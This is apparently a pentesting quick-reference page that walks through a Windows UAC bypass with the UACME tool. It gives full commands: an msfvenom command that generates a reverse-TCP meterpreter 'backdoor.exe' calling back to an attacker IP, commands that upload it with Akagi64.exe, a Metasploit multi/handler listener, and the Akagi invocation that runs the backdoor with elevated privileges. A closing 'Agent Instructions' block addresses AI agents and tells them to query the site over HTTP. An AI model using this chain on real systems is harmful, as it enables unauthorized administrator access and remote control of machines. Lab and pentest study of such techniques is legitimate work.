# Bypassing UAC using the UACME tool

{% embed url="<https://github.com/hfiref0x/UACME>" %}

**UACME:**

* Defeat Windows User Account Control (UAC) and get Administrator privileges.
* It abuses the built-in Windows AutoElevate executables.
* It has 65+ methods that can be used by the user to bypass UAC depending on the Windows OS version.
* Developed by <https://twitter.com/hFireF0X>
* Written majorly in C, with some code in C++

Get a windows shell and check if the admin user is a member of the Administrators group.

```
shell
net localgroup administrators
```

<figure><img src="/files/9GmtQwMx2coIwTgwJrgo" alt=""><figcaption></figcaption></figure>

The admin user is a member of the Administrators group. However, we do not have the high privilege as of now. We can gain high privilege by Bypassing UAC (User Account Control)

We are going to bypass the UAC for admin user with the help of UACMe tool.

&#x20;Generating malicious executable using msfvenom and running it on the target machine to gain administrator user privileges.

**Note:** Please make sure that you replace the “10.10.31.2” local IP address with yours.

Generating malicious executable using msfvenom

```
msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.44.2 LPORT=4444 -f exe > 'backdoor.exe'
```

<figure><img src="/files/wgzmeRWGGMpBSEeYctEV" alt=""><figcaption></figcaption></figure>

Switch the directory to the user’s temp folder and upload the Akagi64.exe and backdoor.exe executable.

```
cd C:\\Users\\admin\\AppData\\Local\\Temp
upload /root/Desktop/tools/UACME/Akagi64.exe .
upload /root/backdoor.exe .
ls
```

<figure><img src="/files/t6wSYl3n5R79e4tdOfSl" alt=""><figcaption></figcaption></figure>

Start another msfconsole and run a multi handler.

```
msfconsole -q
use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 10.10.44.2
set LPORT 4444
exploit
```

Switch back to the meterpreter and run the Akagi64.exe executable.

**Note:** Please provide the full path of the backdoor executable.

```
shell
Akagi64.exe 23 C:\Users\admin\AppData\Local\Temp\backdoor.exe
```

<figure><img src="/files/zh3jtzcjxs81KOlpvq7n" alt=""><figcaption></figcaption></figure>

Once we execute the above command we would expect a meterpreter session.

<figure><img src="/files/8NjsFFh604xc1jERFnTJ" alt=""><figcaption></figcaption></figure>

We have successfully gained high privilege access.&#x20;


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://notes.cavementech.com/pentesting-quick-reference/privilege-escalation/windows-priv-esc/bypassing-uac-using-the-uacme-tool.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.